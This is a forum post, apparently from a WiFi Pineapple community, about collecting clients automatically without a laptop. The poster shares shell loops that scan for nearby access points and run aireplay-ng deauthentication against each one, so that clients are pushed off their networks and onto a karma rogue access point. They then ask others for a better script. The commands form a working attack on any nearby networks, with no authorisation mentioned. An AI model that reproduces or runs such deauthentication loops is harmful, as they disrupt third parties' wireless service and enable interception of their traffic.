Jump to content

Auto Collect Clients Without Laptop


Recommended Posts

karma script is pretty good. but I want to use pineapple without laptop.

i thought "how can i deauth clients from other APs"

first, I tried this:

for ap in $(iwlist wlan0 scan|grep Address|cut -b 30-)

do aireplay-ng mon0 -0 4 -D -a $ap

done

but it isn't works because wlan0 was master mode.

and mon0(monitor mode) isn't work either.

so, i add some trick for it

for ap in $(aireplay-ng mon0 -9 | grep channel | awk '{print $2}')

do aireplay-ng mon0 -0 4 -D -a $ap

done

it works and dont need deny list(air*-ng don't get self BSSID)

but aireplay-ng gets AP list less then 'iwlist scan'

somebody has any script?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...